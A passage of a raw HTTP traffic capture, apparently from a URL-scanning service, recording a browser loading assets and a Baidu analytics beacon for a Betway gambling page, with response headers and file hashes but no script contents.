User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: application/x-javascript
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:18 GMT
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   33255
Md5:    70bbd4a88e327e1cbb4fbf16eeeefcc9
Sha1:   48d6866862f1211b611ebeba0f378515f4fab772
Sha256: d8718b21fc9d7614b9562a1a34894158aef746d441e5e7ff8d370b607dbb489d
                                        
                                            GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1176x885&vl=754&et=0&fl=10.0&ja=1&ln=en-us&lo=0&rnd=1195647731&si=0f203c4517203805d75d02036cd6d835&v=1.2.43&lv=1&ct=!!&tt=betway%E5%BF%85%E5%A8%81_betway%E5%BF%85%E5%A8%81%E5%A8%B1%E4%B9%90_betway%E5%BF%85%E5%A8%81%E5%AE%98%E7%BD%91%E6%89%8B%E6%9C%BA%E7%89%88&sn=58305 HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/index
Cookie: HMACCOUNT=A91EF2F2E757E669

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Cache-Control: private, max-age=0, no-cache
Content-Length: 43
Date: Wed, 24 Apr 2019 15:55:45 GMT
Pragma: no-cache
Server: apache
Strict-Transport-Security: max-age=172800
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   43
Md5:    ad4b0f606e0f8465bc4c4c170b37e1a3
Sha1:   50b30fd5f87c85fe5cba2635cb83316ca71250d7
Sha256: cf4724b2f736ed1a0ae6bc28f1ead963d9cd2c1fd87b6ef32e7799fc1c5c8bda
                                        
                                            GET /biwei/css/bootstrap.min.js HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: application/x-javascript
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:19 GMT
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   11320
Md5:    7bc6a5dd66ba1b5b913bfe9f36bc3c47
Sha1:   ac0da2a118312561bf72bec9922f02f121e4024c
Sha256: dd4aae0061697ee5801eaf22457efe09bd5b5f88bd5f7fce9309ee9f77a2b82f
                                        
                                            GET /biwei/images/logo-head.png HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:19 GMT
Content-Length: 3431
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Connection: keep-alive
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 234 x 42, 8-bit colormap, non-interlaced
Size:   3431
Md5:    dc082e3f5327a1d5c338fd0fdbc45d0d
Sha1:   6fb25501804a40f6520be4215f78ba91d52f0ce9
Sha256: 755ecaa27c73d8290c45954cdf48b717ab8cbde6899fcd9244575308100903af
                                        
                                            GET /biwei/images/partner-logo-sprite.png HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:20 GMT
Content-Length: 31172
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Connection: keep-alive
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 174 x 1000, 8-bit colormap, non-interlaced
Size:   31172
Md5:    e4b63339fb98ac450da5afc0eb780258
Sha1:   26ffc6d7d6c4ca020d64ce7a593dd4914f1b76d5
Sha256: c139231e48c9aaaf97d8920e4149b9c1d4e93658391cfdd668df092f3020af41
                                        
                                            GET /biwei/images/banner7.jpg HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:19 GMT
Content-Length: 190745
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Connection: keep-alive
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   190745
Md5:    602a75135bf8ee551970e903888c6df1
Sha1:   5ce4132c475075edfd374650a27a9631e9f90cc7
Sha256: ceae17e667df9692431bf2fed8c94892cbf75719b72b3ba062d391a7edbdcd50
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: Hm_lvt_0f203c4517203805d75d02036cd6d835=1556121345; Hm_lpvt_0f203c4517203805d75d02036cd6d835=1556121345

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   606
Md5:    db8fd5e2079ea7b9e2d958db2727f993
Sha1:   83ce96be3c3518655233bdd700d1e277f7c3d55d
Sha256: 82f178a970efe9b87396229432903f1ece8ff30c6a21b1ec053ed9e9503b13da
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: Hm_lvt_0f203c4517203805d75d02036cd6d835=1556121345; Hm_lpvt_0f203c4517203805d75d02036cd6d835=1556121345

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   606
Md5:    db8fd5e2079ea7b9e2d958db2727f993
Sha1:   83ce96be3c3518655233bdd700d1e277f7c3d55d
Sha256: 82f178a970efe9b87396229432903f1ece8ff30c6a21b1ec053ed9e9503b13da